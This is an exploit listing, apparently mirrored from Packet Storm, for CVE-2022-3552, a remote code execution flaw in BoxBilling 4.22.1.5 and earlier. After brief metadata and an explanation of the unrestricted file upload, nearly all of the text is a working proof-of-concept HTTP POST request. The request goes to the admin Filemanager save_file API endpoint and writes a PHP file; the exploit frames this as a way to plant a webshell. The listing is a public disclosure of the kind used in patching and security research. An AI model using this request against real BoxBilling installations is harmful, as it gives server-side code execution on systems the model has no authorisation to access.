BoxBilling 4.22.1.5 Remote Code Execution

2023-03-2800:00:00

zetc0de

packetstormsecurity.com

261

boxbilling

remote code execution

vulnerability

unrestricted file upload

rce

exploit

admin

webshell

cms

cve-2022-3552

api

poc

EPSS

0.021

Percentile

89.2%

JSON

`# Exploit Title: BoxBilling<=4.22.1.5 - Remote Code Execution (RCE)  
# Date: 2022-09-18  
# Exploit Author: zetc0de  
# Vendor Homepage: https://www.boxbilling.org/  
# Software Link:  
https://github.com/boxbilling/boxbilling/releases/download/4.22.1.5/BoxBilling.zip  
# Version: <=4.22.1.5 (Latest)  
# Tested on: Windows 10  
# CVE : CVE-2022-3552  
# BoxBilling was vulnerable to Unrestricted File Upload.  
# In order to exploit the vulnerability, an attacker must have a valid  
authenticated session as admin on the CMS.  
# With at least 1 order of product an attacker can upload malicious file to  
hidden API endpoint that contain a webshell and get RCE  
###################################################################################  
  
  
## POC  
POST /index.php?_url=/api/admin/Filemanager/save_file HTTP/1.1  
Host: local.com:8089  
Content-Length: 52  
Accept: application/json, text/javascript, */*; q=0.01  
DNT: 1  
X-Requested-With: XMLHttpRequest  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36  
(KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36  
Content-Type: application/x-www-form-urlencoded  
Cookie: PHPSESSID=3nrf9i4mv28o5anva77ltq042d  
Connection: close  
  
order_id=1&path=ax.php&data=<%3fphp+phpinfo()%3b%3f>  
  
POC Video :  
https://drive.google.com/file/d/1m2glCeJ9QXc8epuY2QfvbWwjLTJ8_Hjx/view?usp=sharing  
  
`

EPSS

0.021

Percentile

89.2%

JSON

Related for PACKETSTORM:171542